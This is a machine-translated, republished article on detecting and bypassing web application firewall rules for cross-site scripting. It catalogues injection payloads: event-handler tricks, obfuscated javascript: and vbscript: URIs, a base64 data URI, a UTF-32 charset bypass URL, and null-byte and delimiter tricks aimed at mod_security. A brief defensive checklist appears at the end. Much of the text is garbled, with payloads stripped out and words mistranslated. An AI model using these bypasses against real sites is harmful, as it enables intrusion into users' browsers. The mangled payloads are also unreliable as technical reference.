Shulou(Shulou.com)05/31 Report--

XSS modern WAF rule detection and bypass technology is what, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Initial test

1. Use harmless payload, like, observe the response to determine whether the application is encoded by HTML, whether the tag is filtered, whether filtered, etc. 2. If you filter closed tags, try payload without closed tags (Save / / Works with IE8)

Parentheses are filtered

/ / By @ secalert trigger, but if filtered, we can still use "autofocusonfocus=alert (1) / / trigger, basically using" close the value attribute, and then add our execution script "onmouseover=prompt (0) x ="onfocusin=alert (1) autofocus x ="onfocusout=alert (1) autofocus x ="onblur=alert (1) autofocus a =" input reflected in the tag is similar to this: Varx= "Input" Usually, we use ">, close the previous tag, but in this case, we can also directly enter the execution script alert (), prompt () confirm (), for example:"; alert (1) / /

Unconventional event monitoring

DOMfocusin,DOMfocusout, and other events, which require specific events to listen for appropriate execution. For example:

Document.body.addEventListener ("DOMActivate", alert (1)) / / "; document.body.addEventListener (" DOMActivate ", prompt (1)) / /"; document.body.addEventListener ("DOMActivate", confirm (1)) / /

A list of such events

DOMAttrModifiedDOMCharacterDataModifiedDOMFocusInDOMFocusOutDOMMouseScrollDOMNodeInsertedDOMNodeInsertedIntoDocumentDOMNodeRemovedDOMNodeRemovedFromDocumentDOMSubtreeModified

Hypertext content

The situation in the code is as follows

Click can use _ javascript:alert (1) / / to execute Click directly

Deformation

Mainly includes case and JavaScript deformation

Javascript:alert (1) javaSCRIPT:alert (1) _ JaVaScRipT:alert (1) javas cript:\ u0061lert (1); _ javascript:\ u0061lert

VBScript can be used below IE10 and in URI

_ vbscript:alert (1); vbscript:alert (1); vbscr ipt:alert (1) "

Data URl

Data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

JSON content

Reflection input

EncodeURIComponent (& # 039)

Can be used

-alert (1)-prompt (1)-confirm (1)-

Result

EncodeURIComponent (& # 039 shareholder warning (1)-& # 039 shareholder alert (1)-& # 039 shareholder alert (1)) encodeURIComponent (& # 039 shareholder alert (1)-& # 039 shareholder alert

Input reflection is inside the svg tag

The source code is as follows

Varmyvar= "YourInput"

You can enter

Www.site.com/test.php?var=text "; alert (1) / /

If the system encodes "characters"

Varmyvar= "text"; alert (1) / / "

The reason is that additional (XML) is introduced into HTML content, which can be encoded twice.

Browser BUG

Character set BUG

The character set BUG is very common in IE, and the earliest bug is UTF-7. If we can control the character set encoding, we can bypass 99% WAF filtering.

Example

Http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

Can control coding, submit

Http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=">

Can be modified to UTF-32 encoded form

?? script?alert (1)? / script? http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

Null byte

The longest to bypass the mod_security firewall is as follows:

Alert (1); alert (1); confirm (0)

Null bytes are only applicable to PHP versions above 5.3.8

Syntax BUG

The node name in the RFC declaration cannot be a space, and the following forms cannot be run in javascript

Alert (1); / / Works upto IE7 reference http://html5sec.org/#71 / / Works upto IE9 reference http://html5sec.org/#115 / / Works in IE7 reference http://html5sec.org/#77 / / Works Upto IE7

Unicode delimiter

[on\ w +\ s *] this rule filters all on events. In order to verify the valid delimiters in each browser, you can use the fuzzing method to test 0x00 to 0xff. The results are as follows: IExplorer= [0x09J 0x0C 0x0C 0x2010x3B] Chrome = [0x09prime0x280x2C 0x3B] Safari = [0x2CMag0x3B] Safari = [0x090x20x280x280x2C 0x3B] Opera = [0x090x20cent0x2C 0x3B] Android = [0x09je 0x2C 0x3B] x0b has been filtered in Mod_security, the method of bypassing rhainfosec:

Missing X-frame option

X-frame is generally thought of as a configuration to protect against click hijacking, but it can also protect against xss vulnerabilities referenced by iframe

Docmodes

IE introduced doc-mode for a long time and provided the back-end compatibility of older browsers, which is risky. The attack scenario is that a hacker can refer to the framework of your site, and he can introduce doc-mode to execute css expressions.

_ expression (open (alert (1)

The following POC can be inserted into the IE7

Window.name deception

Scenario: we use iframe to load a page, we can control the name of the window, here we can also execute javascript code

POC

A

Dot Defender bypass

Blacklisting is never the best solution, but it is relatively efficient compared with whitelisting. For WAF vendors, the best practices are as follows:

1. Developers and administrators should note that WAF can only mitigate attacks, and the protection against known weaknesses is only a time difference with the method of source code repair; 2, to keep the rule base of WAF updated; 3. WAF can configure parameter restrictions, need to provide a manual to configure the parameters content-length maximum and minimum length, content-type type, alarm in the event of intrusion 4. If the WAF is based on the blacklist, make sure that the known browser BUG can be blocked and that the corresponding rule base is updated in a timely manner. After reading the above, have you mastered the methods of XSS modern WAF rule detection and bypass technology? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.